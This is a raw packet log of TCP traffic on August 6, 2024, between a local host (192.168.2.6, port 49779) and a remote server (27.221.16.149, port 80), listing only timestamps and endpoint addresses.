                                                                                                                                    Aug 6, 2024 10:30:26.145802021 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.145813942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.145847082 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.145872116 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.145880938 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.145910025 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146178007 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.146437883 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146456003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146471977 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146538019 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.146538019 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.146552086 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146563053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146574020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146584034 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.146636963 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.233325958 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.286393881 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.485440969 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485498905 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485536098 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485590935 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.485739946 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485755920 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485768080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485779047 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485793114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485802889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485810995 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.485815048 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485821009 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.485840082 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.485872984 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.486566067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486577988 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486589909 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486599922 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486610889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486622095 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.486629009 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486640930 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.486646891 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.486666918 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.486676931 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.487401962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487428904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487452030 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487476110 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487479925 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.487499952 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487524033 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.487524033 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487549067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487785101 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.487896919 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.487953901 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.488323927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.536387920 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.573831081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.614501953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.829761028 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.829822063 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.829884052 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830208063 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830262899 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830308914 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830312967 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830348015 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830398083 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830398083 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830430984 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830462933 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830476999 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830497026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830532074 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830578089 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830682039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830729961 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830746889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830826998 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830861092 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.830863953 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.830913067 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.831315041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831365108 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831398964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831409931 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.831432104 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831464052 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831474066 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.831496954 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831531048 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831540108 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.831890106 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831940889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.831943989 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.831974030 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832026958 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.832082033 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832113981 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832165956 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832207918 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832216024 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.832264900 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.832456112 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832606077 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832637072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832659960 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:26.832669020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:26.832720041 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152087927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152193069 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152244091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152249098 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152282000 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152327061 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152333021 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152367115 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152400970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152431011 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152447939 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152493954 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152513027 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152561903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152594090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152612925 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152626991 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152674913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152703047 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152708054 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152740002 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152772903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152782917 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152806997 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152822971 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152838945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152869940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152888060 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152901888 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152932882 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152956009 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.152966022 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.152997971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153017998 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153031111 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153067112 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153126001 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153321981 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153373003 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153373957 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153407097 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153486013 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153517962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153525114 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153552055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153573036 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153599977 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153642893 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153649092 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153681040 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153713942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153731108 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.153745890 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.153784037 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.154298067 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.208254099 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.450892925 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450918913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450930119 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450939894 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450951099 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450961113 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450972080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.450978994 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.450984955 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451045036 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451045036 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451050043 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451122046 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451139927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451178074 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451185942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451203108 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451214075 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451220036 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451225996 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451231956 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451236963 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451313972 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451328039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451340914 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451350927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451354027 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451356888 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.451371908 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.451406956 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452158928 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452171087 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452176094 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452217102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452227116 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452233076 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452243090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452251911 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452289104 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452289104 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452466965 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452476978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452493906 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452512026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452522039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452527046 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452528000 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452538967 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452603102 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452619076 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452629089 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452635050 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.452677965 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.452677965 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.453130960 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.453577042 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.454035997 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791054964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791086912 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791102886 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791114092 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791124105 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791134119 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791145086 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791157007 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791161060 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791191101 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791201115 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791212082 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791220903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791224003 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791230917 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791239023 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791240931 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791249037 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791253090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791321993 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791420937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791430950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791440964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791450977 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791460037 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791470051 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791470051 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.791501045 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791522026 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.791992903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792092085 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792095900 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792105913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792115927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792131901 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792141914 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792151928 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792161942 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792171001 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792171001 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792171001 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792191982 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792202950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792213917 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792223930 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792233944 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792236090 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792243958 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792246103 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792293072 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.792911053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792958975 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.792968988 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.793011904 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.793011904 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:27.793241024 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.793253899 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.793263912 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:27.793358088 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134270906 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134345055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134398937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134422064 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134433031 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134469032 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134519100 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134520054 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134556055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134588003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134634018 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134665966 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134686947 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134686947 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134699106 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134732008 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134753942 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134764910 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134798050 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134823084 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:28.134830952 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134864092 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:28.134896994 CEST804977927.221.16.149192.168.2.6
